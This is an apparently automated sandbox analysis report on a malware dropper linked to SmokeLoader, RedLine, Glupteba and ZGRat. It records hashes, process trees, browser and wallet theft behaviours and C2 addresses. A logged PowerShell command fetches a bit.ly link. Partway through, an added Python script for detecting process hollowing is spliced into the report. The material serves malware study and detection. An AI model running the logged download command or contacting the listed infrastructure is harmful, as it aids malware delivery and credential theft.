Analysis Overview
SHA256
bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23
Threat Level: Known bad
The file 0x0031000000014721-451.dat was found to be: Known bad.
Malicious Activity Summary
ZGRat
RedLine
Detect ZGRat V1
Glupteba
Smokeloader family
RedLine payload
Glupteba payload
SmokeLoader
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Deletes itself
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Unsigned PE
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 18:37
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 18:37
Reported
2023-12-18 18:40
Platform
win7-20231215-en
Max time kernel
28s
Max time network
76s
Command Line
Signatures
RedLine
RedLine payload
SmokeLoader
Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe
"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"
C:\Users\Admin\AppData\Local\Temp\624C.exe
C:\Users\Admin\AppData\Local\Temp\624C.exe
C:\Users\Admin\AppData\Local\Temp\7698.exe
C:\Users\Admin\AppData\Local\Temp\7698.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp" /SL5="$9011E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\7DF8.exe
C:\Users\Admin\AppData\Local\Temp\7DF8.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| BG | 91.92.254.7:80 | N/A | tcp |
| US | 64.185.227.156:80 | N/A | tcp |
Files
memory/3032-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3032-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1212-1-0x0000000002D90000-0x0000000002DA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\624C.exe
| MD5 | 1628c4ac16c9fd4e60d6eefcfd0ca1f2 |
| SHA1 | 362aec5a747ed3b99996fdc972cb51a72f818689 |
| SHA256 | 8df146244d8f1677c82c8a4414b504c3c9a329caf69218fd53c507b12f8da4d1 |
| SHA512 | afec20745144619d3b6e1581e77066f2426376b494545dde68c4c54c787d9f7df8e8c56bca56d1d12b317e7d131d41abd357004560df33a7a5249a07762358ba |
C:\Users\Admin\AppData\Local\Temp\624C.exe
| MD5 | a8c45021e6ee96ad127bf25eebbfedce |
| SHA1 | 5a103eba454730a01163f3d2428e2ce58ddf6168 |
| SHA256 | 7e894d180dbbad9f65b50616c1bc58187a0d9a24dc6b4f0e9b54a1f2500eff37 |
| SHA512 | 7744e358272aebc99fb923ed68b7a0ff454cc703e9d2490c11ad1d744f8856088cbf84b2eb236f89f0475804b241b8e5f401cad37be275183be245fc1494d2b1 |
memory/2084-14-0x0000000000160000-0x00000000001B2000-memory.dmp
memory/2084-19-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/2084-20-0x0000000004F50000-0x0000000004F90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7698.exe
| MD5 | b3eeb284533de706d1e39562e5942a79 |
| SHA1 | 8ec197e20c89179ce3678542d8ed07a0bac57db2 |
| SHA256 | 79dc01a0e266231b5506cc53471e1bfc3f55f5f822887bd8d816c6d35c2987a9 |
| SHA512 | 36cc734e7ff565f803001b055f4628303ff9498af6e266da71547602a112ba55a665b3257c1956c81c550503f913892acae074784d833d9b26d6a0bb7472c0a0 |
C:\Users\Admin\AppData\Local\Temp\7698.exe
| MD5 | 3306bb02d2aabd9a9bfe1e8aa818c928 |
| SHA1 | 0549c179379986e1da422068fba02c83e254203b |
| SHA256 | dace15ac43d36c47b1004b095735004aa3c49889150cfae6188310bbf847b923 |
| SHA512 | aebae65fda2f3e0436998fb74ca2817468e798ee061a6a514328ef67bb88c3cac6ead4857d4df5447982f401266e52b2b7e7ad725519412f728ce16b7f026298 |
memory/2772-27-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/2772-28-0x00000000003B0000-0x00000000011A2000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | ab888f57379c9057ec94a73a5d4349a5 |
| SHA1 | 3fec7dba1d5ea81db05750982cef21d29ce4fa1e |
| SHA256 | 204c59c9ed4cb80b17ec80a394f59759fe67994fb3e67ef88a763ff7362ecd05 |
| SHA512 | 1907056136e4143e6bd1e3c8a433b4789d276f8c5dd4279b19323be8cba647227aaf92c5f6a106724a006261ad6edc5ec305cc74a0765422549df200d278fe2c |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 174caa766705bbb082dfa30456d19f64 |
| SHA1 | 357925425b7f47e99703eecd2872f0f59049362f |
| SHA256 | d4b6605b07ac8e62fae56fbda1a8cf7a706fe6c839e0ea95aee1e52d69ca97d2 |
| SHA512 | edc7ff3bfc5bc6c9bfe4224e8fd8185e2b015240a2914193537ed2b1108867805dfc401c9c618c275603d1daf37dcdf22177e9a792eb6b209d665c5e8bfb75ec |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | a98f6155e05cdc4398d2b3d0365b5a28 |
| SHA1 | 8bc35073fde1405157a5343b7714fbed1b63188a |
| SHA256 | 47c421bad8acc2658e9d1c52995b50441b186aadc9137ac479df7c61169bb750 |
| SHA512 | e73c48f9c392b9ec7b965f67099392dae9ce77e88176d385bfed6bdf496b9dae4784ba186d3bae62f66588a4d3720ca68446014cc86f758275a1f6812288bad4 |
\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
memory/2016-58-0x0000000002680000-0x0000000002A78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 857aa3af511550939ad23672ca2b224e |
| SHA1 | ee9c9bf95ab211b984096067562bcbd0ca2c82d8 |
| SHA256 | 7e6df4f2a364f3e3c6b1a26a84a423f0f88c559f76053cd2694a93fae47e0fbf |
| SHA512 | e203093d98fcb4aa46ffa9201cbde37c786faa2ace76eec957bd01e3b3c79d22ab7149e7e0e54f8238da8205258cd5ea452db04a4d140edf033b3530d93f36ff |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9643eb2f7eda63e52e5a60ccd1aea256 |
| SHA1 | 29c45961f81e94335da5e46574039c64aad22131 |
| SHA256 | e7b364a898b373a029e41066f1a26f8269be239a0acea25e3626989b4931d683 |
| SHA512 | 332d2a6aa31e2bf08ebf49c6372c3fa17c7aca9918ba113b4eb51a49e198e4e632ef8379f1848738f5dfbd22659b4404f5000dac3e1e542760c169d15d3eca22 |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 46caf6b0b64506200e5ffd7041ce660f |
| SHA1 | 79c5657532c534b174c71f224655df47d3cbd919 |
| SHA256 | 333b469824d914c162ab3818260d1bd49de8119d6849b69df71cda88ca35a565 |
| SHA512 | bda2e364445fb4a446fda0b59e32b4a6bbce07c87b8bc11727551d5b3adf453586ab75b5350dd7b3c2cfd48f3a2cd9ad42de798e23dd15f4102f7ac1dade110a |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e44770a5b7f40d91cb4c08244a7a256c |
| SHA1 | 27ddf7042c48857f1e3d1ddcc767d3fd7c90f25e |
| SHA256 | 811b13ba8f0100d5edc178d46d9f02b9a99509694c13b5c762752f1e148d3c89 |
| SHA512 | d338448675725972d137bdd538e91879e0365eb31974a7b3fe62af70f12c629dd6c6e2ef3805d18ec123c2acb1dfe4e896b22c5f93cf2dda74b751afd8c1ef98 |
memory/2772-69-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/1332-68-0x0000000000400000-0x0000000000418000-memory.dmp
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 30cd9f0f501e42d2b2c633d09b0add80 |
| SHA1 | 9e14624ff630dc3c97b9cbf7b7d680c70abcc1a5 |
| SHA256 | 2577d1c2e4f276f4e93fc4f4c26492a439adaa756028ab2490d5d4d5ddfd9e1a |
| SHA512 | 5a2a82039de2a3e7159a4b0de2965d4613c3b626274289f542926dd4f6fc0a90d6a1a9fc50810ed54161a22a0383c54eb2f57a5186dc6e24d160d42675b44717 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | bbef2475688a65343f8f453bad9d0395 |
| SHA1 | 8a0768b76b0f96e5029da243d7f6ae9e7b076ab4 |
| SHA256 | 63ea7a4254b4c816a1024713afbaef6487bdf13941740222b2ab34224d147e5b |
| SHA512 | b64aef5a53f12e1ae3ebf1ee960de0b4d5624af9696c8d597d59a658d85044cb457e3334fffbf29817d82e74c7475b2262469a39d83b488a40696bf2806a7078 |
memory/2016-71-0x0000000002680000-0x0000000002A78000-memory.dmp
memory/2016-73-0x0000000002A80000-0x000000000336B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | c104d059ac2795e96636c3215ce2275e |
| SHA1 | 201a2ac1a95d771320e6a8cf676004962fd26e75 |
| SHA256 | fe09443103ec4cbb314be81394f4634d4d8000efaa48714148431a3f90750906 |
| SHA512 | c58d56a7625eab84c11dcd82ddbb9e92941036469e0fad9dc08d95ab610fcc108f4bfd60ec1306cf8fd9e605092cf74918c64ac8a4570fe36fa72094136cb0d3 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 0a90f231fcfede6e071cfa5e88b244f7 |
| SHA1 | 161954936f6bef19c895d6798a9ebc1e36eb8d5f |
| SHA256 | 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e |
| SHA512 | 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 397bd9efec644db61e4764ba5cacb749 |
| SHA1 | dd586711e8f17e2f853360da174934d500b341f1 |
| SHA256 | 9a628170aaeb05856e58480ef9a7827ac1a2e1775b164fd3acb93b4a055c218e |
| SHA512 | 42fe49140ef7ff2fd67620c06a53b4b7c8a9c0a05206b566c0a9f342624d1a70dbe7c7ac518ade448bd91881d600ec0ec5d806c81e26720f6c9e4d1df01ecd74 |
memory/2016-87-0x0000000000400000-0x0000000000D1C000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2188-103-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2908-114-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\??\c:\users\admin\appdata\local\temp\is-nlvck.tmp\tuc3.tmp
| MD5 | 0f512e7e71a73563a86f7da8ca8022a7 |
| SHA1 | b7eff07b2aac336e1d8f755f806005c22561ac86 |
| SHA256 | 628e8a1bf0c16e97d84ccc3309786a0f4d5aba46893825e12aee6c1c582c6d69 |
| SHA512 | 823db9dde7df4e5d4f4baff4facaa1be79412bf0a2acd3e9885507599c8a7a75728eda9fe4b90c000881b8a656428a6461b26e52d198de388d45e92cecd11319 |
C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
| MD5 | b3fae67141280b66be24d8e960b48263 |
| SHA1 | 4e18d90912568b09f4ae03006c80f4e591dd528b |
| SHA256 | ea2b9a05672b85405c86532abd8f1ad97f39020d02b094a0ebb6c7a4b2bf95c6 |
| SHA512 | 1f0b67c557e22f721b7bdd71343f900cb10a401df6be5a67a21f212c14e652e8a0a1afdb7c57a327b1cf5a464166c8d1c60d4fdf417acf71da863fb54b069545 |
\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
| MD5 | 6045f66424564f5dba00cedb688e7fa7 |
| SHA1 | ad441a2c48880eaf398d4e1fe9409223b89265f6 |
| SHA256 | c410fa72fecadc8db0439a87014640853a152a5e5268528b80a7feadd919e21d |
| SHA512 | a4a6d3e9111596eb8dffff6c54ca9ad3fe91e49397319a2f26ed02440f185c7a96fba35bcd45ed05a679d250392d8a49999385aae65dd3248bb8583d65ecf497 |
\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 48f3709376715226b10f39ca25a17b47 |
| SHA1 | 7d12464c646314f7d6530d1a485521dbecb176df |
| SHA256 | 01902b0ae74c0cb8b31fb8c3145eaed642704e4c82c8b7d63d873936dfd7f6b4 |
| SHA512 | 6ca7e610e4c1efda0514587aa3c49d3045b600d3a0d446c30fb767cfe3c3c0e47e147e47d61dc88102cb9a5551c02fa214c3bd578def42d4636566f1ac137bbd |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 18:37
Reported
2023-12-18 18:40
Platform
win10v2004-20231215-en
Max time kernel
43s
Max time network
84s
Command Line
Signatures
Detect ZGRat V1
Glupteba
Glupteba payload
RedLine
RedLine payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F4B0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
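The SetThreadContext row above (6C2.exe, PID 4440, writing the thread context of a RegSvcs.exe it spawned, PID 2684) is the classic shape of process hollowing into a signed .NET utility host. The following detection logic is an added example, not the sandbox's own signature code: it replays a constructed event stream modelled on that finding and alerts only when the source runs from a user-writable directory and the target is a known hollowing host. The PIDs 4440/2684 and the two image paths are taken from the report; the parent PIDs, the benign control rows, the event field names and the host/directory lists are assumptions.

```python
"""Detect SetThreadContext-based hollowing from process telemetry.

Added example, not the sandbox's own signature code. Event field names are
hypothetical, not a real EDR schema.
"""
import ntpath

# Assumption: signed Microsoft binaries that .NET loaders commonly hollow out.
HOLLOWING_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
                   "applaunch.exe", "vbc.exe", "aspnet_compiler.exe"}
# Assumption: directories any user can write to; code injecting from here is suspect.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\downloads\\",
                 "\\public\\", "\\programdata\\")

# Constructed event stream. PIDs 4440/2684 and their images come from the report;
# parent PIDs and the benign control rows are invented.
EVENTS = [
    {"type": "process_create", "pid": 4440, "ppid": 1800,
     "image": r"C:\Users\Admin\AppData\Local\Temp\6C2.exe"},
    {"type": "process_create", "pid": 2684, "ppid": 4440,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"type": "set_thread_context", "source_pid": 4440, "target_pid": 2684},
    # Benign control: a tool under Program Files touching its own RegSvcs child.
    {"type": "process_create", "pid": 5100, "ppid": 900,
     "image": r"C:\Program Files\Vendor\debugger.exe"},
    {"type": "process_create", "pid": 5101, "ppid": 5100,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"type": "set_thread_context", "source_pid": 5100, "target_pid": 5101},
    # Temp-dir process setting its own thread context: not this pattern.
    {"type": "process_create", "pid": 5200, "ppid": 1800,
     "image": r"C:\Users\Admin\AppData\Local\Temp\F4B0.exe"},
    {"type": "set_thread_context", "source_pid": 5200, "target_pid": 5200},
]


def from_user_writable(image):
    """True when the image path lies under a directory any user can write to."""
    return any(marker in image.lower() for marker in USER_WRITABLE)


def detect_hollowing(events):
    """Return one alert per SetThreadContext call matching the injection pattern."""
    procs = {}          # pid -> {"image", "ppid"}, built from creation events
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            procs[ev["pid"]] = {"image": ev["image"], "ppid": ev["ppid"]}
            continue
        if ev["type"] != "set_thread_context":
            continue
        src = procs.get(ev["source_pid"])
        dst = procs.get(ev["target_pid"])
        if not src or not dst or ev["source_pid"] == ev["target_pid"]:
            continue    # unknown pid or self-modification: not cross-process injection
        target_name = ntpath.basename(dst["image"]).lower()
        if target_name not in HOLLOWING_HOSTS or not from_user_writable(src["image"]):
            continue    # needs both: a hollowing host as target and a suspect source
        alerts.append({
            "source": src["image"],
            "target": dst["image"],
            "target_is_child": dst["ppid"] == ev["source_pid"],
            "technique": "process hollowing via SetThreadContext",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_hollowing(EVENTS):
        print(alert)
```

The `target_is_child` flag is carried in the alert rather than used as a gate: a freshly spawned child is the strongest version of the pattern, but loaders also inject into hosts they did not create, so the rule keys on the source directory and the target image and leaves the parent relationship as context for the analyst.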
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\F4B0.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe
"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
C:\Users\Admin\AppData\Local\Temp\6C2.exe
C:\Users\Admin\AppData\Local\Temp\6C2.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\412D.exe
C:\Users\Admin\AppData\Local\Temp\412D.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp" /SL5="$C002E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\6ACF.exe
C:\Users\Admin\AppData\Local\Temp\6ACF.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 83.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.229.1:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.229.231.54.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| N/A | 195.20.16.103:18305 | N/A | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 212.62.237.104.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| RU | 5.42.64.35:80 | 5.42.64.35 | tcp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 8.8.8.8:53 | 7.254.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.64.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
